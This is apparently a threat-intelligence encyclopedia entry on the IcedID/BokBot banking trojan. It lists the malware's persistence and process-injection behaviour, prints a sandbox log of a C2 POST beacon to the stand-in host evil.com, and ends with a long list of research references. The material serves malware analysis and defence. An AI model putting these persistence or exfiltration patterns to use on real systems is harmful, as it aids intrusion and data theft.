SYMBOLCOMMON_NAMEaka. SYNONYMS
win.icedid (Back to overview)

IcedID

aka: BokBot, IceID

Actor(s): Lunar Spider

URLhaus        

Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
* Name: Update
* Trigger: At Log on
* Action: %LocalAppData%\$Example\\waroupada.exe /i
* Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
rundll32.exe kernel32,Sleep -s
* Setup a local listener to proxy traffic on 127.0.0.1:50000

**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

References
2021-04-19NetresecErik Hjelmvik
@online{hjelmvik:20210419:analysing:c6bff49, author = {Erik Hjelmvik}, title = {{Analysing a malware PCAP with IcedID and Cobalt Strike traffic}}, date = {2021-04-19}, organization = {Netresec}, url = {https://netresec.com/?b=214d7ff}, language = {English}, urldate = {2021-04-20} } Analysing a malware PCAP with IcedID and Cobalt Strike traffic
Cobalt Strike IcedID
2021-04-17YouTube (Worcester DEFCON Group)Joel Snape, Nettitude
@online{snape:20210417:inside:2c3ae5c, author = {Joel Snape and Nettitude}, title = {{Inside IcedID: Anatomy Of An Infostealer}}, date = {2021-04-17}, organization = {YouTube (Worcester DEFCON Group)}, url = {https://www.youtube.com/watch?v=YEqLIR6hfOM}, language = {English}, urldate = {2021-04-20} } Inside IcedID: Anatomy Of An Infostealer
IcedID
2021-04-12Trend MicroRaphael Centeno, Don Ovid Ladores, Lala Manly, Junestherry Salvador, Frankylnn Uy
@online{centeno:20210412:spike:d67dcb0, author = {Raphael Centeno and Don Ovid Ladores and Lala Manly and Junestherry Salvador and Frankylnn Uy}, title = {{A Spike in BazarCall and IcedID Activity Detected in March}}, date = {2021-04-12}, organization = {Trend Micro}, url = {https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html}, language = {English}, urldate = {2021-04-14} } A Spike in BazarCall and IcedID Activity Detected in March
BazarBackdoor IcedID
2021-04-10Youtube (AhmedS Kasmani)AhmedS Kasmani
@online{kasmani:20210410:malware:e2000de, author = {AhmedS Kasmani}, title = {{Malware Analysis: IcedID Banking Trojan JavaScript Dropper}}, date = {2021-04-10}, organization = {Youtube (AhmedS Kasmani)}, url = {https://www.youtube.com/watch?v=oZ4bwnjcXWg}, language = {English}, urldate = {2021-04-12} } Malware Analysis: IcedID Banking Trojan JavaScript Dropper
IcedID
2021-04-09MicrosoftEmily Hacker, Justin Carroll, Microsoft 365 Defender Threat Intelligence Team
@online{hacker:20210409:investigating:2b6f30a, author = {Emily Hacker and Justin Carroll and Microsoft 365 Defender Threat Intelligence Team}, title = {{Investigating a unique “form” of email delivery for IcedID malware}}, date = {2021-04-09}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/}, language = {English}, urldate = {2021-04-12} } Investigating a unique “form” of email delivery for IcedID malware
IcedID
2021-04-09aaqeel01Ali Aqeel
@online{aqeel:20210409:icedid:a6e3243, author = {Ali Aqeel}, title = {{IcedID Analysis}}, date = {2021-04-09}, organization = {aaqeel01}, url = {https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/}, language = {English}, urldate = {2021-04-12} } IcedID Analysis
IcedID
2021-04-07MinervaMinerva Labs
@online{labs:20210407:icedid:d178d16, author = {Minerva Labs}, title = {{IcedID - A New Threat In Office Attachments}}, date = {2021-04-07}, organization = {Minerva}, url = {https://blog.minerva-labs.com/icedid-maas}, language = {English}, urldate = {2021-04-09} } IcedID - A New Threat In Office Attachments
IcedID
2021-04-07UptycsAshwin Vamshi, Abhijit Mohanta
@online{vamshi:20210407:icedid:bbda303, author = {Ashwin Vamshi and Abhijit Mohanta}, title = {{IcedID campaign spotted being spiced with Excel 4 Macros}}, date = {2021-04-07}, organization = {Uptycs}, url = {https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros}, language = {English}, urldate = {2021-04-09} } IcedID campaign spotted being spiced with Excel 4 Macros
IcedID
2021-04-01Reversing LabsRobert Simmons
@online{simmons:20210401:code:885c081, author = {Robert Simmons}, title = {{Code Reuse Across Packers and DLL Loaders}}, date = {2021-04-01}, organization = {Reversing Labs}, url = {https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders}, language = {English}, urldate = {2021-04-09} } Code Reuse Across Packers and DLL Loaders
IcedID SystemBC
2021-03-31Red CanaryRed Canary
@techreport{canary:20210331:2021:cd81f2d, author = {Red Canary}, title = {{2021 Threat Detection Report}}, date = {2021-03-31}, institution = {Red Canary}, url = {https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf}, language = {English}, urldate = {2021-04-06} } 2021 Threat Detection Report
Shlayer Andromeda Cobalt Strike Dridex Emotet IcedID MimiKatz QakBot TrickBot
2021-03-29The DFIR ReportThe DFIR Report
@online{report:20210329:sodinokibi:4c63e20, author = {The DFIR Report}, title = {{Sodinokibi (aka REvil) Ransomware}}, date = {2021-03-29}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/}, language = {English}, urldate = {2021-03-30} } Sodinokibi (aka REvil) Ransomware
Cobalt Strike IcedID REvil
2021-03-12Binary DefenseJames Quinn
@online{quinn:20210312:icedid:3e6db43, author = {James Quinn}, title = {{IcedID GZIPLOADER Analysis}}, date = {2021-03-12}, organization = {Binary Defense}, url = {https://www.binarydefense.com/icedid-gziploader-analysis/}, language = {English}, urldate = {2021-03-16} } IcedID GZIPLOADER Analysis
IcedID
2021-03-04F5Dor Nizar, Roy Moshailov
@online{nizar:20210304:icedid:bfcc689, author = {Dor Nizar and Roy Moshailov}, title = {{IcedID Banking Trojan Uses COVID-19 Pandemic to Lure New Victims}}, date = {2021-03-04}, organization = {F5}, url = {https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims}, language = {English}, urldate = {2021-03-06} } IcedID Banking Trojan Uses COVID-19 Pandemic to Lure New Victims
IcedID
2021-03Group-IBOleg Skulkin, Roman Rezvukhin, Semyon Rogachev
@techreport{skulkin:202103:ransomware:992ca10, author = {Oleg Skulkin and Roman Rezvukhin and Semyon Rogachev}, title = {{RANSOMWARE UNCOVERED 2020—2021}}, date = {2021-03}, institution = {Group-IB}, url = {https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf}, language = {English}, urldate = {2021-04-16} } RANSOMWARE UNCOVERED 2020—2021
RansomEXX BazarBackdoor Buer Clop Conti Ransomware DoppelPaymer Dridex Egregor IcedID Maze PwndLocker QakBot RansomEXX REvil Ryuk SDBbot TrickBot Zloader
2021-02-26CrowdStrikeEric Loui, Sergei Frankoff
@online{loui:20210226:hypervisor:8dadf9c, author = {Eric Loui and Sergei Frankoff}, title = {{Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact}}, date = {2021-02-26}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout}, language = {English}, urldate = {2021-03-02} } Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact
RansomEXX Griffon Carbanak Cobalt Strike IcedID MimiKatz PyXie RansomEXX REvil
2021-02-25FireEyeBryce Abdo, Brendan McKeague, Van Ta
@online{abdo:20210225:so:88f3400, author = {Bryce Abdo and Brendan McKeague and Van Ta}, title = {{So Unchill: Melting UNC2198 ICEDID to Ransomware Operations}}, date = {2021-02-25}, organization = {FireEye}, url = {https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html}, language = {English}, urldate = {2021-03-02} } So Unchill: Melting UNC2198 ICEDID to Ransomware Operations
Cobalt Strike Egregor IcedID Maze SystemBC
2021-02-23CrowdStrikeCrowdStrike
@techreport{crowdstrike:20210223:2021:bf5bc4f, author = {CrowdStrike}, title = {{2021 Global Threat Report}}, date = {2021-02-23}, institution = {CrowdStrike}, url = {https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf}, language = {English}, urldate = {2021-02-25} } 2021 Global Threat Report
RansomEXX Amadey Anchor Avaddon Ransomware BazarBackdoor Clop Cobalt Strike Conti Ransomware Cutwail DanaBot DarkSide DoppelPaymer Dridex Egregor Emotet Hakbit IcedID JSOutProx KerrDown LockBit Mailto Maze MedusaLocker Mespinoza Mount Locker NedDnLoader Nemty Pay2Key PlugX Pushdo PwndLocker PyXie QakBot Quasar RAT RagnarLocker Ragnarok RansomEXX REvil Ryuk Sekhmet Ransomware ShadowPad SmokeLoader Snake Ransomware SUNBURST SunCrypt TEARDROP TrickBot WastedLocker Winnti Zloader
2021-02-02CRONUPGermán Fernández
@online{fernndez:20210202:de:6ff4f3a, author = {Germán Fernández}, title = {{De ataque con Malware a incidente de Ransomware}}, date = {2021-02-02}, organization = {CRONUP}, url = {https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware}, language = {Spanish}, urldate = {2021-03-02} } De ataque con Malware a incidente de Ransomware
Avaddon Ransomware BazarBackdoor Buer Clop Cobalt Strike Conti Ransomware DanaBot Dharma Dridex Egregor Emotet Empire Downloader FriedEx GootKit IcedID MegaCortex Nemty Phorpiex PwndLocker PyXie QakBot RansomEXX REvil Ryuk SDBbot SmokeLoader TrickBot Zloader
2021-01-19Palo Alto Networks Unit 42Brad Duncan
@online{duncan:20210119:wireshark:be0c831, author = {Brad Duncan}, title = {{Wireshark Tutorial: Examining Emotet Infection Traffic}}, date = {2021-01-19}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/}, language = {English}, urldate = {2021-01-21} } Wireshark Tutorial: Examining Emotet Infection Traffic
Emotet GootKit IcedID QakBot TrickBot
2021-01-19Medium elis531989Eli Salem
@online{salem:20210119:funtastic:42f9250, author = {Eli Salem}, title = {{Funtastic Packers And Where To Find Them}}, date = {2021-01-19}, organization = {Medium elis531989}, url = {https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7}, language = {English}, urldate = {2021-01-21} } Funtastic Packers And Where To Find Them
Get2 IcedID QakBot
2021-01-18tccontre Blogtcontre
@online{tcontre:20210118:extracting:4935b1c, author = {tcontre}, title = {{Extracting Shellcode in ICEID .PNG Steganography}}, date = {2021-01-18}, organization = {tccontre Blog}, url = {https://tccontre.blogspot.com/2021/01/}, language = {English}, urldate = {2021-01-21} } Extracting Shellcode in ICEID .PNG Steganography
IcedID
2021-01-07Palo Alto Networks Unit 42Brad Duncan
@online{duncan:20210107:ta551:6346c62, author = {Brad Duncan}, title = {{TA551: Email Attack Campaign Switches from Valak to IcedID}}, date = {2021-01-07}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/ta551-shathak-icedid/}, language = {English}, urldate = {2021-01-11} } TA551: Email Attack Campaign Switches from Valak to IcedID
IcedID
2020-12-10NRI SECURENeoSOC
@online{neosoc:20201210:icedid:b05d899, author = {NeoSOC}, title = {{マルウェア「IcedID」の検知傾向と感染に至るプロセスを徹底解説}}, date = {2020-12-10}, organization = {NRI SECURE}, url = {https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid}, language = {Japanese}, urldate = {2020-12-11} } マルウェア「IcedID」の検知傾向と感染に至るプロセスを徹底解説
IcedID
2020-12-09CiscoDavid Liebenberg, Caitlin Huey
@online{liebenberg:20201209:quarterly:9ed3062, author = {David Liebenberg and Caitlin Huey}, title = {{Quarterly Report: Incident Response trends from Fall 2020}}, date = {2020-12-09}, organization = {Cisco}, url = {https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html}, language = {English}, urldate = {2020-12-10} } Quarterly Report: Incident Response trends from Fall 2020
Cobalt Strike IcedID Maze RansomEXX Ryuk
2020-12-09MicrosoftMicrosoft 365 Defender Research Team
@online{team:20201209:edr:c8811f1, author = {Microsoft 365 Defender Research Team}, title = {{EDR in block mode stops IcedID cold}}, date = {2020-12-09}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/}, language = {English}, urldate = {2020-12-11} } EDR in block mode stops IcedID cold
IcedID
2020-12-02CyberIntCyberint Research
@online{research:20201202:icedid:d43e06d, author = {Cyberint Research}, title = {{IcedID Stealer Man-in-the-browser Banking Trojan}}, date = {2020-12-02}, organization = {CyberInt}, url = {https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan}, language = {English}, urldate = {2020-12-11} } IcedID Stealer Man-in-the-browser Banking Trojan
IcedID
2020-11-26CybereasonLior Rochberger, Cybereason Nocturnus
@online{rochberger:20201126:cybereason:8301aeb, author = {Lior Rochberger and Cybereason Nocturnus}, title = {{Cybereason vs. Egregor Ransomware}}, date = {2020-11-26}, organization = {Cybereason}, url = {https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware}, language = {English}, urldate = {2020-12-08} } Cybereason vs. Egregor Ransomware
Cobalt Strike Egregor IcedID ISFB QakBot
2020-09-29MicrosoftMicrosoft
@techreport{microsoft:20200929:microsoft:6e5d7b0, author = {Microsoft}, title = {{Microsoft Digital Defense Report}}, date = {2020-09-29}, institution = {Microsoft}, url = {https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf}, language = {English}, urldate = {2020-10-05} } Microsoft Digital Defense Report
Emotet IcedID Mailto Maze QakBot REvil RobinHood TrickBot
2020-08-16kienmanowar Blogm4n0w4r
@online{m4n0w4r:20200816:manual:7a970b8, author = {m4n0w4r}, title = {{Manual Unpacking IcedID Write-up}}, date = {2020-08-16}, organization = {kienmanowar Blog}, url = {https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/}, language = {English}, urldate = {2020-08-20} } Manual Unpacking IcedID Write-up
IcedID
2020-08-12JuniperPaul Kimayong
@online{kimayong:20200812:icedid:b40f8b4, author = {Paul Kimayong}, title = {{IcedID Campaign Strikes Back}}, date = {2020-08-12}, organization = {Juniper}, url = {https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back}, language = {English}, urldate = {2020-08-27} } IcedID Campaign Strikes Back
IcedID
2020-08-10tccontre Blogtccontre
@online{tccontre:20200810:learning:8cc052c, author = {tccontre}, title = {{Learning From ICEID loader - Including its Steganography Payload Parsing}}, date = {2020-08-10}, organization = {tccontre Blog}, url = {https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html}, language = {English}, urldate = {2020-08-14} } Learning From ICEID loader - Including its Steganography Payload Parsing
IcedID
2020-07-30SpamhausSpamhaus Malware Labs
@techreport{labs:20200730:spamhaus:038546d, author = {Spamhaus Malware Labs}, title = {{Spamhaus Botnet Threat Update Q2 2020}}, date = {2020-07-30}, institution = {Spamhaus}, url = {https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf}, language = {English}, urldate = {2020-07-30} } Spamhaus Botnet Threat Update Q2 2020
AdWind Agent Tesla Arkei Stealer AsyncRAT Ave Maria Azorult DanaBot Emotet IcedID ISFB KPOT Stealer Loki Password Stealer (PWS) Nanocore RAT NetWire RC NjRAT Pony Raccoon RedLine Stealer Remcos Zloader
2020-07-01Cisco TalosNick Biasini, Edmund Brumaghin, Mariano Graziano
@online{biasini:20200701:threat:a726b7e, author = {Nick Biasini and Edmund Brumaghin and Mariano Graziano}, title = {{Threat Spotlight: Valak Slithers Its Way Into Manufacturing and Transportation Networks}}, date = {2020-07-01}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2020/07/valak-emerges.html}, language = {English}, urldate = {2020-08-18} } Threat Spotlight: Valak Slithers Its Way Into Manufacturing and Transportation Networks
Valak IcedID ISFB MyKings Spreader
2020-06-22zero2autoDaniel Bunce
@online{bunce:20200622:unpacking:8a02d84, author = {Daniel Bunce}, title = {{Unpacking Visual Basic Packers – IcedID}}, date = {2020-06-22}, organization = {zero2auto}, url = {https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/}, language = {English}, urldate = {2020-06-24} } Unpacking Visual Basic Packers – IcedID
IcedID
2020-06-18JuniperPaul Kimayong
@online{kimayong:20200618:covid19:4bb5511, author = {Paul Kimayong}, title = {{COVID-19 and FMLA Campaigns used to install new IcedID banking malware}}, date = {2020-06-18}, organization = {Juniper}, url = {https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware}, language = {English}, urldate = {2020-06-23} } COVID-19 and FMLA Campaigns used to install new IcedID banking malware
IcedID
2020-06-17Github (f0wl)Marius Genheimer
@online{genheimer:20200617:deicer:de78cca, author = {Marius Genheimer}, title = {{deICEr: A Go tool for extracting config from IcedID second stage Loaders}}, date = {2020-06-17}, organization = {Github (f0wl)}, url = {https://github.com/f0wl/deICEr}, language = {English}, urldate = {2020-06-18} } deICEr: A Go tool for extracting config from IcedID second stage Loaders
IcedID
2020-05-29Group-IBIvan Pisarev
@online{pisarev:20200529:icedid:9627fda, author = {Ivan Pisarev}, title = {{IcedID: When ice burns through bank accounts}}, date = {2020-05-29}, organization = {Group-IB}, url = {https://www.group-ib.com/blog/icedid}, language = {English}, urldate = {2020-06-02} } IcedID: When ice burns through bank accounts
IcedID
2020-03-04CrowdStrikeCrowdStrike
@techreport{crowdstrike:20200304:2020:818c85f, author = {CrowdStrike}, title = {{2020 CrowdStrike Global Threat Report}}, date = {2020-03-04}, institution = {CrowdStrike}, url = {https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf}, language = {English}, urldate = {2020-07-24} } 2020 CrowdStrike Global Threat Report
MESSAGETAP More_eggs 8.t Dropper Anchor BabyShark BadNews Clop Cobalt Strike CobInt Cobra Carbon System Cutwail DanaBot Dharma DoppelPaymer Dridex Emotet FlawedAmmyy FriedEx Gandcrab Get2 IcedID ISFB KerrDown LightNeuron LockerGoga Maze MECHANICAL Necurs Nokki Outlook Backdoor Phobos Ransomware Predator The Thief QakBot REvil RobinHood Ryuk SDBbot Skipper SmokeLoader TerraRecon TerraStealer TerraTV TinyLoader TrickBot vidar Winnti ANTHROPOID SPIDER Anunak APT31 APT39 BlackTech BuhTrap Charming Kitten CLOCKWORD SPIDER DOPPEL SPIDER Gamaredon Group Leviathan MONTY SPIDER Mustang Panda NARWHAL SPIDER NOCTURNAL SPIDER Pinchy Spider Pirate Panda Salty Spider SCULLY SPIDER SMOKY SPIDER Thrip VENOM SPIDER
2020-02-18Sophos LabsLuca Nagy
@online{nagy:20200218:nearly:8ff363f, author = {Luca Nagy}, title = {{Nearly a quarter of malware now communicates using TLS}}, date = {2020-02-18}, organization = {Sophos Labs}, url = {https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/}, language = {English}, urldate = {2020-02-27} } Nearly a quarter of malware now communicates using TLS
Dridex IcedID TrickBot
2020-01-22Thomas Barabosch
@online{barabosch:20200122:malware:f805475, author = {Thomas Barabosch}, title = {{The malware analyst’s guide to PE timestamps}}, date = {2020-01-22}, url = {https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/}, language = {English}, urldate = {2021-01-25} } The malware analyst’s guide to PE timestamps
Azorult Gozi IcedID ISFB LOLSnif SUNBURST TEARDROP
2020SecureworksSecureWorks
@online{secureworks:2020:gold:65fcc96, author = {SecureWorks}, title = {{GOLD SWATHMORE}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-swathmore}, language = {English}, urldate = {2020-05-23} } GOLD SWATHMORE
GlobeImposter Gozi IcedID TrickBot Lunar Spider
2019-12-18Github (psrok1)Paweł Srokosz
@online{srokosz:20191218:icedid:05c3255, author = {Paweł Srokosz}, title = {{IcedID PNG Extractor}}, date = {2019-12-18}, organization = {Github (psrok1)}, url = {https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b}, language = {English}, urldate = {2020-01-13} } IcedID PNG Extractor
IcedID
2019-12-12FireEyeChi-en Shen, Oleg Bondarenko
@online{shen:20191212:cyber:e01baca, author = {Chi-en Shen and Oleg Bondarenko}, title = {{Cyber Threat Landscape in Japan – Revealing Threat in the Shadow}}, date = {2019-12-12}, organization = {FireEye}, url = {https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko}, language = {English}, urldate = {2020-04-16} } Cyber Threat Landscape in Japan – Revealing Threat in the Shadow
Cerberus TSCookie Cobalt Strike Dtrack Emotet Formbook IcedID Icefog IRONHALO Loki Password Stealer (PWS) PandaBanker PLEAD poisonplug TrickBot BlackTech
2019-12-03MalwarebytesThreat Intelligence Team
@online{team:20191203:new:39b59e1, author = {Threat Intelligence Team}, title = {{New version of IcedID Trojan uses steganographic payloads}}, date = {2019-12-03}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/}, language = {English}, urldate = {2019-12-24} } New version of IcedID Trojan uses steganographic payloads
IcedID
2019-07-09FortinetKai Lu
@online{lu:20190709:deep:90d708f, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection}}, date = {2019-07-09}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html}, language = {English}, urldate = {2020-01-08} } A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection
IcedID
2019-06-25Dawid Golak
@online{golak:20190625:icedid:0a3e153, author = {Dawid Golak}, title = {{IcedID aka #Bokbot Analysis with Ghidra}}, date = {2019-06-25}, url = {https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766}, language = {English}, urldate = {2019-12-02} } IcedID aka #Bokbot Analysis with Ghidra
IcedID
2019-06-16FortinetKai Lu
@online{lu:20190616:deep:ba89738, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)}}, date = {2019-06-16}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html}, language = {English}, urldate = {2019-11-27} } A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)
IcedID
2019-04-04SecurityIntelligenceNir Somech, Limor Kessem
@online{somech:20190404:icedid:54ba40f, author = {Nir Somech and Limor Kessem}, title = {{IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth}}, date = {2019-04-04}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/}, language = {English}, urldate = {2020-01-08} } IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth
IcedID
2019-03-21CrowdStrikeShaun Hurley, James Scalise
@online{hurley:20190321:interception:7e57329, author = {Shaun Hurley and James Scalise}, title = {{Interception: Dissecting BokBot’s “Man in the Browser”}}, date = {2019-03-21}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/}, language = {English}, urldate = {2019-12-20} } Interception: Dissecting BokBot’s “Man in the Browser”
IcedID
2019-02-15CrowdStrikeBrendon Feeley, Bex Hartley
@online{feeley:20190215:sinful:729f693, author = {Brendon Feeley and Bex Hartley}, title = {{“Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web}}, date = {2019-02-15}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/}, language = {English}, urldate = {2019-12-20} } “Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web
Dyre IcedID TrickBot Vawtrak Lunar Spider WIZARD SPIDER
2019-02-06SecurityIntelligenceItzik Chimino, Limor Kessem, Ophir Harpaz
@online{chimino:20190206:icedid:ef0caad, author = {Itzik Chimino and Limor Kessem and Ophir Harpaz}, title = {{IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites}}, date = {2019-02-06}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/}, language = {English}, urldate = {2020-01-08} } IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites
IcedID
2019-01-03CrowdStrikeShaun Hurley, James Scalise
@online{hurley:20190103:digging:5219f6d, author = {Shaun Hurley and James Scalise}, title = {{Digging into BokBot’s Core Module}}, date = {2019-01-03}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/}, language = {English}, urldate = {2019-12-20} } Digging into BokBot’s Core Module
IcedID
2018-11-09Youtube (OALabs)Sean Wilson, Sergei Frankoff
@online{wilson:20181109:reverse:7e90205, author = {Sean Wilson and Sergei Frankoff}, title = {{Reverse Engineering IcedID / Bokbot Malware Part 2}}, date = {2018-11-09}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=7Dk7NkIbVqY}, language = {English}, urldate = {2019-07-09} } Reverse Engineering IcedID / Bokbot Malware Part 2
IcedID
2018-10-26Youtube (OALabs)Sergei Frankoff
@online{frankoff:20181026:unpacking:b6155cc, author = {Sergei Frankoff}, title = {{Unpacking Bokbot / IcedID Malware - Part 1}}, date = {2018-10-26}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=wObF9n2UIAM}, language = {English}, urldate = {2020-01-08} } Unpacking Bokbot / IcedID Malware - Part 1
IcedID
2018-09-07Vitali Kremez
@online{kremez:20180907:lets:8515a2b, author = {Vitali Kremez}, title = {{Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1}}, date = {2018-09-07}, url = {https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html}, language = {English}, urldate = {2020-01-08} } Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1
IcedID
2018-08-09Fox-ITAlfred Klason
@online{klason:20180809:bokbot:499f316, author = {Alfred Klason}, title = {{Bokbot: The (re)birth of a banker}}, date = {2018-08-09}, organization = {Fox-IT}, url = {https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/}, language = {English}, urldate = {2019-12-20} } Bokbot: The (re)birth of a banker
IcedID Vawtrak
